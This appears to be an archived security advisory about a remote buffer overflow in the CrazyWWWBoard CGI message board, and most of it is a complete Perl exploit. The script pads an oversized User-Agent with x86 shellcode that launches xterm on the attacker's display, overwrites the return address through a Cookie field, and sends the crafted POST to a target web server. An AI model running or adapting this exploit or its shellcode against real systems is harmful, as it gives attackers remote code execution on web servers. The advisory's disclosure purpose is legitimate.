COMMAND

    CrazyWWWBoard

SYSTEMS AFFECTED

    CrazyWWWBoard

PROBLEM

    'teleh0r' found following.  He has discovered a buffer overflow in
    CrazyWWWBoard Full Edition && CrazyWWWBoard Limited Edition.  This
    is NOT that same overflow as discovered by Jin Ho You:

        http://oliver.efri.hr/~crv/security/bugs/Others/cwb.html

    This overflow  will allow  for arbitrary  code execution  with the
    privileges  of  the  web  server.   The  versions  which have been
    tested   are:     CrazyWWWBoard2000p4    for   RedHat   6.0    and
    CrazyWWWBoard2000LEp5 for RedHat 6.1.

    Proof of Concept exploit:

    #!/usr/bin/perl
    
    # | Remote buffer overflow exploit for CrazyWWWBoard
    # | Nobreak Technologies - www.crazywwwboard.com/
    # | Copyright (c) 2001 by <teleh0r@doglover.com>
    # | All rights reserved.
    # |
    # | http://www.digit-labs.org/
    # | Usage: $0 -t target -a attacker -d dpy -o offset
    
    use Getopt::Std; getopts('t:a:d:o:', \%args);
    use Socket;
    
    if (defined($args{'t'})) { $target   = $args{'t'}; }
    if (defined($args{'a'})) { $attacker = $args{'a'}; }
    if (defined($args{'d'})) { $dpy      = $args{'d'}; }
    if (defined($args{'o'})) { $offset   = $args{'o'}; }
    
    $shellcode = # RaiSe <raise@undersec.com>
    "\xeb\x4f\x5e\x31\xd2\x88\x56\x14\x88\x56\x18\x88\x56".
    "\x21\xb2\x2b\x31\xc9\xb1\x09\x80\x3c\x32\x4b\x74\x05".
    "\x42\xe2\xf7\xeb\x2b\x88\x34\x32\x31\xd2\x89\xf3\x89".
    "\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d\x7e\x19\x89\x7e".
    "\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e\x36".
    "\x8d\x56\x46\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8".
    "\x40\xcd\x80\xe8\xac\xff\xff\xff/usr/X11R6/bin/xterm".
    "8-ut8-display8${attacker}:${dpy}K";
    
    # Remember to allow $target to connect to your X by
    # using xhost + $target.
    
    $return = 0xbffff2d8;
    $length = 324;
    $egglen = 5000;
    
    if (!(defined($target && $attacker && $dpy))) {
        die("Usage: $0 -t \"target\" -a \"attacker\" -d \"dpy\"\n");
    }
    
    print("Address: 0x", sprintf('%lx', ($return + $offset)), "\n");
    $new_ret = pack('l', ($return + $offset));
    
    for ($i = 0; $i < $length; $i += 4) {
        $buffer .= $new_ret;
    }
    
    for ($i = 0; $i < ($egglen - length($shellcode)); $i++) {
        $egg .= 'A';
    }
    
    $egg .= $shellcode;
    
    $exploit =
    "POST /cgi-bin/CrazyWWWBoard.cgi HTTP/1.1
    User-Agent: $egg
    Host: localhost
    Accept: text/html, image/png, image/jpeg, image/gif
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Referer: http://teleh0r.cjb.net/
    Cookie: ID=gadmin; ASC=$buffer
    Connection: Keep-Alive, TE
    TE: deflate, gzip, chunked, identity, trailers
    Content-type: application/x-www-form-urlencoded
    Content-length: 55
    
    mode=center&ftype=6&backdepth=1&ID=gadmin&PASSWORD=0000";
    
    $iaddr = inet_aton($target)                  || die("Error: $!\n");
    $paddr = sockaddr_in(80, $iaddr)             || die("Error: $!\n");
    $proto = getprotobyname('tcp')               || die("Error: $!\n");
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    send(SOCKET,"$exploit\015\012", 0)           || die("Error: $!\n");
    close(SOCKET);

SOLUTION

    Nothing yet.